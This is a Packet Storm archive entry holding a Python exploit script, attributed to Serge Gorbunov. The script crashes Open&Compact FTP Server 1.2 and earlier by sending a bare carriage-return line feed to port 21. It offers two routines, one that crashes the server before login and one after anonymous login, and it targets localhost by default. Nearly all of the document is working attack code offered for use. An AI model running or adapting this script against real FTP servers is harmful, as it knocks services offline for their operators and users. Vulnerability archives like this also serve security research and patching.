Open And Compact FTP Server 1.2 Denial Of Service

2010-06-19T00:00:00
ID PACKETSTORM:90815
Type packetstorm
Reporter Serge Gorbunov
Modified 2010-06-19T00:00:00

Description

                                        
                                            `# Exploit Title: Open&Compact Ftp Server <= 1.2 Denial Of Service  
# Date: June 12, 2010  
# Author: Serge Gorbunov  
# Software Link: http://sourceforge.net/projects/open-ftpd/  
# Version: <= 1.2  
# Tested on: Windows 7, Windows XP SP3  
  
#!/usr/bin/python  
  
# This exploits allows to crash open ftpd server at any time simply  
# by sending '\r\n' into the socket.   
# You can send '\r\n' before authentication or after authentication  
# and the server will always crash.   
# Below are two examples of crashing the server:  
# Call either crashServerBeforeAuth or crashServerAfterAuth from   
# the main function.  
  
import socket  
  
  
  
def main():  
s.connect( ( "127.0.0.1", 21 ) )  
  
crashServerBeforeAuth()  
# crashServerAfterAuth()   
  
s.close()   
  
  
def crashServerBeforeAuth():   
print s.recv( 512 )  
s.send( '\r\n' )  
  
def crashServerAfterAuth():  
print s.recv( 512 )  
s.send('USER anonymous\r\n' )  
print s.recv( 512 )  
s.send('PASS anonymous\r\n' )  
print s.recv( 512 )  
  
s.send( '\r\n' )   
  
  
if __name__ == "__main__":  
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )  
main()  
  
`